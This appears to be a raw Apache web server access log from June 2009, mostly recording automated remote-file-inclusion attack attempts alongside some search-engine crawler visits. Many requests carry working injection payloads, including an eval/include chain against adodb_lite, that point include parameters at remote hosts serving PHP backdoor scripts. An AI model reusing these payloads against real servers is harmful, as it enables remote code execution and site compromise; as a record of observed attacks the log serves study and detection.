125.131.116.12 - - [27/Jun/2009:03:55:23 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:55:26 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
210.188.236.212 - - [27/Jun/2009:03:56:58 -0500] "GET /logs/access_log.1240704000/joomla/index.php?option=com_restaurante&task=http://189.42.60.57/soul/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:58:11 -0500] "GET /logs//include/footer.php?_path[counter]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:58:11 -0500] "GET //include/footer.php?_path[counter]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:58:11 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:58:20 -0500] "GET /logs//include/footer.php?_path[counter]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:58:20 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:58:20 -0500] "GET //include/footer.php?_path[counter]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:58:43 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:03:58:58 -0500] "GET /logs//abbc/abbc.class.php?mosConfig_absolute_path=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:59:00 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
87.106.179.130 - - [27/Jun/2009:04:00:26 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:01:25 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.51.131.210 - - [27/Jun/2009:04:01:57 -0500] "GET /logs/access_log.1225238400////appserv/errors.php?error=http://indiedocs.com/forum/language/lang_english/lang_faq?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
210.188.236.212 - - [27/Jun/2009:04:07:02 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://189.42.60.57/soul/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
65.55.106.185 - - [27/Jun/2009:04:13:23 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.198.32.3 - - [27/Jun/2009:04:15:16 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
91.198.32.3 - - [27/Jun/2009:04:15:17 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 200 194917 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:17:38 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:17:38 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:17:57 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:17:57 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:18:25 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:18:25 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:18:50 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:18:51 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:23:48 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:23:48 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.151.224.238 - - [27/Jun/2009:04:24:24 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.820"
209.151.224.238 - - [27/Jun/2009:04:24:24 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.820"
87.106.179.130 - - [27/Jun/2009:04:24:40 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:24:40 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:25:43 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:25:43 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:25:59 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:26:12 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:26:16 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:27:00 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
96.9.180.229 - - [27/Jun/2009:04:27:32 -0500] "GET /e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:04:27:32 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:04:27:32 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:04:27:32 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
87.106.179.130 - - [27/Jun/2009:04:29:02 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:29:02 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:29:48 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:29:48 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:29:55 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:04:29:55 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
84.201.208.50 - - [27/Jun/2009:04:29:58 -0500] "GET /e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:04:29:58 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:04:29:58 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:04:29:58 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.198.32.3 - - [27/Jun/2009:04:31:11 -0500] "GET /include/mail.inc.php?skin_board_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
91.198.32.3 - - [27/Jun/2009:04:31:11 -0500] "GET /logs/include/mail.inc.php?skin_board_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
38.99.44.102 - - [27/Jun/2009:04:34:54 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.68.42 - - [27/Jun/2009:04:37:43 -0500] "GET /?D=A HTTP/1.1" 200 3245 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.68.42 - - [27/Jun/2009:04:37:44 -0500] "GET /silver_spanish_piece_of_eight.htm HTTP/1.1" 200 2427 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.68.42 - - [27/Jun/2009:04:37:51 -0500] "GET /logs/ HTTP/1.1" 200 194912 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
91.9.231.139 - - [27/Jun/2009:04:40:03 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:04:40:03 -0500] "GET /logs/access_log.1239753600//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:04:40:04 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:04:40:18 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:04:40:51 -0500] "GET /e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:04:40:51 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:04:40:51 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:04:40:51 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:04:41:22 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:04:41:22 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:04:41:23 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:04:42:12 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:04:44:14 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:04:44:14 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:04:44:14 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:04:45:14 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:04:45:56 -0500] "GET /environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:04:45:56 -0500] "GET /logs/access_log.1234224000/environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:04:45:56 -0500] "GET /logs/environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:04:45:56 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:04:46:52 -0500] "GET /environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:04:46:52 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:04:46:52 -0500] "GET /logs/environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:04:47:14 -0500] "GET /logs/access_log.1234224000/environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.165.73.157 - - [27/Jun/2009:04:48:06 -0500] "GET //_test_holidays.php?APB_rp=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
121.165.73.157 - - [27/Jun/2009:04:48:06 -0500] "GET /logs/access_log.1228608000//_test_holidays.php?APB_rp=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
121.165.73.157 - - [27/Jun/2009:04:48:07 -0500] "GET /logs//_test_holidays.php?APB_rp=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
83.16.182.130 - - [27/Jun/2009:04:49:16 -0500] "GET /environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:04:49:16 -0500] "GET /logs/environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:04:49:17 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:04:50:31 -0500] "GET /logs/access_log.1234224000/environment.php?DIR_PREFIX=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:04:58:28 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:04:58:28 -0500] "GET /logs/access_log.1228867200//include/admin.lib.inc.php?site_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:04:58:28 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:04:59:17 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:04:59:17 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:04:59:17 -0500] "GET /logs/access_log.1228867200//include/admin.lib.inc.php?site_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.232.68.137 - - [27/Jun/2009:05:01:10 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.232.68.137 - - [27/Jun/2009:05:01:10 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.232.68.137 - - [27/Jun/2009:05:01:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.232.68.137 - - [27/Jun/2009:05:01:58 -0500] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.23.192 - - [27/Jun/2009:05:10:44 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
62.140.23.192 - - [27/Jun/2009:05:10:44 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
84.201.208.50 - - [27/Jun/2009:05:14:15 -0500] "GET /errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:05:14:15 -0500] "GET /logs/access_log.1236124800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:05:14:15 -0500] "GET /logs/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:05:14:22 -0500] "GET /logs/access_log.1239062400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.217 - - [27/Jun/2009:05:15:54 -0500] "GET /logs/access_log.1132185600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.75.60.116 - - [27/Jun/2009:05:16:50 -0500] "GET /logs/access_log.1233619200//e404.php?INCLUDE_FOLDER=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:05:16:50 -0500] "GET //e404.php?INCLUDE_FOLDER=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:05:16:50 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:05:16:51 -0500] "GET //e404.php?INCLUDE_FOLDER=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:05:16:51 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:05:16:51 -0500] "GET /logs/access_log.1233619200//e404.php?INCLUDE_FOLDER=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:05:17:38 -0500] "GET /errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:05:17:38 -0500] "GET /logs/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:05:17:38 -0500] "GET /logs/access_log.1236124800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:05:17:53 -0500] "GET /logs/access_log.1239062400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.239 - - [27/Jun/2009:05:18:16 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.140.23.192 - - [27/Jun/2009:05:21:55 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
62.140.23.192 - - [27/Jun/2009:05:21:56 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
83.98.209.71 - - [27/Jun/2009:05:29:37 -0500] "GET /logs/include/footer.php?site_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:05:29:37 -0500] "GET /include/footer.php?site_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
65.55.106.172 - - [27/Jun/2009:05:30:24 -0500] "GET /logs/access_log.1173312000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.223.3.98 - - [27/Jun/2009:05:34:07 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
